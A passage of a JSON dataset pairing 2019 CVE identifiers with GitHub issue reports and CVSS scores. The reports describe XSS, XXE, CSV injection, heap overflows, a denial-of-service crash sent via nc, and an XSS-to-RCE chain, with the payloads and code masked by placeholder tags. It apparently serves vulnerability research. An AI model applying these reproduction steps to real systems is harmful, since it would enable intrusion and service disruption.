        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11472",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1546",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1546",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-14T07:21:12Z",
        "description": "FPE errors when reading XWD images. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When using APITAG on XWD files, it may emit FPE errors at multiple locations. Steps to Reproduce run APITAG ASAN messages may be like: APITAG ERRORTAG APITAG ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected in APITAG but I found this also happens in APITAG NUMBERTAG POCs: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11490",
        "Issue_Url_old": "https://github.com/nmap/nmap/issues/1568",
        "Issue_Url_new": "https://github.com/nmap/npcap/issues/308",
        "Repo_new": "nmap/npcap",
        "Issue_Created_At": "2019-04-22T20:48:04Z",
        "description": "Npcap NUMBERTAG Pool Corruption. Description: Sending a malformed .pcap with npcap loopback adapter causes kernel pool corruption. Analysis: When sending a malformed .pcap file with the npcap loopback adapter using either APITAG or APITAG results in kernel pool corruption. This vulnerability could lead to arbitrary code executing inside the Windows kernel and allow elevation of privileges. Version: npcap NUMBERTAG Tested on: Windows NUMBERTAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11498",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/67",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/67",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2019-03-04T19:43:54Z",
        "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit config.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11519",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/3713",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/3713",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2019-04-24T03:05:15Z",
        "description": "XXE processing. I believe I have found a zero day which allows an attacker to read files of the server by uploading a XML file in the following: Configurations > Languages > Edit Language > Import Resources > Upload XML file to perform XXE attack and read files of the server. I used Burp Collaborator to read the files and its content since it is a blind XXE Source: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-11596",
        "Issue_Url_old": "https://github.com/memcached/memcached/issues/474",
        "Issue_Url_new": "https://github.com/memcached/memcached/issues/474",
        "Repo_new": "memcached/memcached",
        "Issue_Created_At": "2019-04-10T10:38:46Z",
        "description": "segfault (null pointer dereference) during lru command handling. Dear memcached team \u2014 I have detected a SIGSEGV during the lru command handling. Version APITAG How to reproduce Start memcached APITAG Send malicious payload via nc: APITAG ASAN ERRORTAG Please let me know what additional information I can provide to successfully reproduce the issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11597",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1555",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1555",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-27T13:08:13Z",
        "description": "heap_buffer_overflow in APITAG of coders/tiff.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11598",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1540",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1540",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-08T03:10:13Z",
        "description": "heap buffer overflow in APITAG of coders/pnm.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/pnm.c. Steps to Reproduce APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11632",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5529",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5529",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-05-01T05:15:06Z",
        "description": "(LTS NUMBERTAG ariable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11632",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5528",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5528",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-05-01T05:11:04Z",
        "description": "Variable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11633",
        "Issue_Url_old": "https://github.com/dustyfresh/HoneyPress/issues/1",
        "Issue_Url_new": "https://github.com/dustyfresh/honeypress/issues/1",
        "Repo_new": "dustyfresh/HoneyPress",
        "Issue_Created_At": "2019-05-01T09:36:36Z",
        "description": "Fingerprinting. Honeypress can be fingerprinted by attackers because of the ingrained unique hostnames within the APITAG templates. \" FILETAG \" \" FILETAG \"",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11636",
        "Issue_Url_old": "https://github.com/zcash/zcash/issues/3955",
        "Issue_Url_new": "https://github.com/zcash/zcash/issues/3955",
        "Repo_new": "zcash/zcash",
        "Issue_Created_At": "2019-04-16T22:38:26Z",
        "description": "Denial of Service. Scaling discussions don\u2019t make sense unless the ultimately goal is to reduce the likelihood that users will not be able to use Zcash because of a lack of service. There are lots of ways to fill up our service currently. When we spot them, we should link them to this epic. A small number of shielded transaction of massive size. A small number of or many transactions with many empty outputs. Many small transactions filling the mempool currently crash the nodes that receive them. It\u2019s possible to knock nodes offline Transaction expiry helps reduce the cost for an attacker. Additionally, the failure mode is currently catastrophic. Filling the mempool currently results in a node crash. With such an attack, someone might be able to knock over mining pool operators, and thus significantly drop the hashpower of the network, facilitating a NUMBERTAG attack. Suggested course of action: Set limits on the mempool size, and reject further transactions Other steps that result in the reduction of the likelihood of a successful APITAG attack",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11641",
        "Issue_Url_old": "https://github.com/threatstream/agave/issues/1",
        "Issue_Url_new": "https://github.com/pwnlandia/agave/issues/1",
        "Repo_new": "pwnlandia/agave",
        "Issue_Created_At": "2019-05-01T11:18:28Z",
        "description": "Fingerprinting. Agave fails to avoid fingerprinting by including its own name within HTML templates.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11770",
        "Issue_Url_old": "https://github.com/eclipse/buildship/issues/855",
        "Issue_Url_new": "https://github.com/eclipse/buildship/issues/855",
        "Repo_new": "eclipse/buildship",
        "Issue_Created_At": "2019-02-18T21:04:48Z",
        "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common: See: URLTAG URLTAG Source Locations: Download of Eclipse SDK: URLTAG URLTAG Eclipse SDK has no checksum verification: URLTAG Download of Gradle: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11808",
        "Issue_Url_old": "https://github.com/ratpack/ratpack/issues/1448",
        "Issue_Url_new": "https://github.com/ratpack/ratpack/issues/1448",
        "Repo_new": "ratpack/ratpack",
        "Issue_Created_At": "2019-04-23T01:51:49Z",
        "description": "Use UUID directly for generating session IDs.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11818",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/635",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/635",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2019-04-08T08:22:14Z",
        "description": "Cross Site Scripting NUMBERTAG New User. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG and before. Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User NUMBERTAG Insert APITAG in First Name and Last Name field. APITAG NUMBERTAG Inserted APITAG payload will be executed on all pages where user information is displayed such as user confirmation, user list, user view etc. APITAG Version details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11819",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/636",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/636",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2019-04-08T10:36:24Z",
        "description": "CSV Injection NUMBERTAG New User. Hello Team, I would like to report a vulnerability (CSV Injection) which I have observed in current version NUMBERTAG and before. When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User Insert APITAG in First Name and Last Name field APITAG NUMBERTAG Now export all user information in CSV by using export feature in application. Quick Launch > Account Management > User Management > Export User NUMBERTAG Once user opens the affected CSV file, payload will be triggered APITAG APITAG Version Details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11834",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/337",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/337",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2019-02-21T03:29:14Z",
        "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG can bypass NUMBERTAG bug can be trigger with json string buffer that end with NUMBERTAG or not ERRORTAG test demo, compile at ubuntu NUMBERTAG cause stackoverflow\uff1a ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11835",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/338",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/338",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2019-02-21T03:56:18Z",
        "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG this bug can delete NUMBERTAG cross border read&write, and if use str API result will fault, cause some logical problem, such as stack&heapoverflow, leak info etc.. CODETAG this should be code as below: CODETAG just leak stack data for test server.c CODETAG client iP: APITAG prot NUMBERTAG recv bufdata = / abcdefghjklmn After APITAG bufdata: APITAG `",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11837",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/155",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/155",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-07T18:38:36Z",
        "description": "Segfault in APITAG for negative arguments.. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11838",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/153",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/153",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-07T17:43:35Z",
        "description": "heap buffer overflow in APITAG APITAG ERRORTAG Probably is the same as NUMBERTAG array struct corruption while resizing). Minified test from fluff URLTAG report.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11839",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/152",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/152",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-07T17:30:56Z",
        "description": "heap buffer overflow in APITAG APITAG ERRORTAG Minified test from fluff URLTAG report.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11840",
        "Issue_Url_old": "https://github.com/golang/go/issues/30965",
        "Issue_Url_new": "https://github.com/golang/go/issues/30965",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-03-20T22:32:56Z",
        "description": "PATHTAG keystream loop in amd NUMBERTAG implementation after APITAG If more than NUMBERTAG APITAG of keystream is generated, or if the counter otherwise grows greater than NUMBERTAG bits, the amd NUMBERTAG implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications. The issue might affect uses of PATHTAG with extremely large messages. Architectures other than amd NUMBERTAG and uses that generate less than NUMBERTAG APITAG of keystream for a single APITAG invocation are unaffected. This issue was discovered and reported by Michael APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11870",
        "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/598",
        "Issue_Url_new": "https://github.com/s9y/serendipity/issues/598",
        "Repo_new": "s9y/serendipity",
        "Issue_Created_At": "2019-03-07T14:35:55Z",
        "description": "XSS via exiftag. The attached file contains an XSS payload as the camera model EXIF tag. Uploading it to s9y and looking at the details of the file will execute. The exif tag printing should be escaped. APITAG this is only self xss, there are situations where this could still be exploited, imagine someone sending a photo to someone else for a blogpost.) FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11881",
        "Issue_Url_old": "https://github.com/rancher/rancher/issues/20216",
        "Issue_Url_new": "https://github.com/rancher/rancher/issues/20216",
        "Repo_new": "rancher/rancher",
        "Issue_Created_At": "2019-05-13T23:21:30Z",
        "description": "Web Parameter Tampering on APITAG APITAG What kind of request is this ( PATHTAG request): Enhancement Steps to reproduce (least amount of steps as possible): Access the following endpoint on any Rancher instance up to NUMBERTAG URLTAG APITAG Result: It will display a link to OWASP Wiki explaining Web Parameter Tampering. Other details that may be helpful: Tags are effectively filtered. Environment information Rancher version ( APITAG / APITAG image tag or shown bottom left in the UI NUMBERTAG Installation option (single install/HA): APITAG Cluster information Cluster type APITAG PATHTAG ): Machine type ( PATHTAG ) and specifications (CPU/memory): Kubernetes version (use kubectl version ): APITAG Docker version (use docker version ): APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12041",
        "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/331",
        "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/331",
        "Repo_new": "jonschlinkert/remarkable",
        "Issue_Created_At": "2019-05-13T10:39:02Z",
        "description": "APITAG Regex APITAG vulnerability in parsing html tag. If you guys are not familiar with this type of bug, here is the detail explanation: URLTAG Vulnerable line of code: URLTAG APITAG CODETAG This will hang forever due to the regex matching of CDATA tag.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12043",
        "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/332",
        "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/332",
        "Repo_new": "jonschlinkert/remarkable",
        "Issue_Created_At": "2019-05-13T12:15:57Z",
        "description": "APITAG bad url bypass, could lead to XSS. Hi, check out this reported issue URLTAG Im able to bypass the bad url check, implemented here URLTAG CODETAG It will generate output like this APITAG Which could pop up an alert when user clicks into it. Fix: maybe we can strip unprintable character around the url scheme?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12047",
        "Issue_Url_old": "https://github.com/getgridea/gridea/issues/105",
        "Issue_Url_new": "https://github.com/getgridea/gridea/issues/105",
        "Repo_new": "getgridea/gridea",
        "Issue_Created_At": "2019-05-13T05:48:39Z",
        "description": "Vulnerability: XSS to RCE. Hi, I found an XSS vulnerability that can cause RCE. And I recorded a GIF URLTAG to demonstrate controlling the local win NUMBERTAG through this vulnerability. Cause of vulnerability The post content editing area does not filter or prevent the running of js script, resulting in the use of XSS to call Nodejs module ( for example: APITAG ) to achieve arbitrary code execution. If the user imports content containing malicious code, the vulnerability will be triggered. Payload ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12086",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2326",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2326",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-05-11T17:31:34Z",
        "description": "Possible new CVE wrt Polymorphic typing (placeholder). A new potential CVE via Polymorphic Typing has been reported: this issue is a placeholder until CVE assigned, problem evaluated. Affects all versions released up to and including NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12101",
        "Issue_Url_old": "https://github.com/darconeous/libnyoci/issues/21",
        "Issue_Url_new": "https://github.com/darconeous/libnyoci/issues/21",
        "Repo_new": "darconeous/libnyoci",
        "Issue_Created_At": "2019-05-14T15:18:38Z",
        "description": "There is a logical defect that causes a denial of service vulnerability. PATHTAG lines NUMBERTAG len = ( buffer NUMBERTAG F); switch(( buffer NUMBERTAG default: if(key) key += ( buffer NUMBERTAG buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer; buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer FILETAG Then the function coap_decode_option will set the length parameter to NUMBERTAG and the value_len in the function nyoci_inbound_option_strequal in PATHTAG is NUMBERTAG lines NUMBERTAG CODETAG If value_len is NUMBERTAG the subsequent loop is not executed (line NUMBERTAG and if the second argument cstr is an empty string, the return value is true (normal logic will return false in the loop) The function APITAG in PATHTAG for handling requests calls APITAG , and the second argument passed in is an empty string(lines NUMBERTAG CODETAG Therefore, the special data packet will pass the judgment, the program will enter the assignment to the variable prefix (the variable prefix is \u200b\u200bempty at this time), and the program eventually crashes. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12105",
        "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/1245",
        "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/1245",
        "Repo_new": "supervisor/supervisor",
        "Issue_Created_At": "2019-05-29T14:01:52Z",
        "description": "[ CVETAG ] Unauthenticated user can read log files or restart a service. Luan Souza (luansouza. EMAILTAG ) wrote in email: > So, I was search for vulnerabites in my work company and I founded supervisord, it's a good service but the user don't need authetication for view logs ou restart a service, this is a called a misconfiguration, because some people put this online and anyone can acess, and view logs e restart services therefore I submmit to a CVE, they requered to contact the developer to see if will fix the bug and howmuch time is required needed to do. > > Best regards, > ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12136",
        "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3007",
        "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3007",
        "Repo_new": "boostio/boostnote-legacy",
        "Issue_Created_At": "2019-05-14T03:56:09Z",
        "description": "A xss on the newest version. XSS There is a xss in the newest version via a label named mermaid When we insert codes like this: APITAG we can see there is a xss in the latest version. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-12137",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2505",
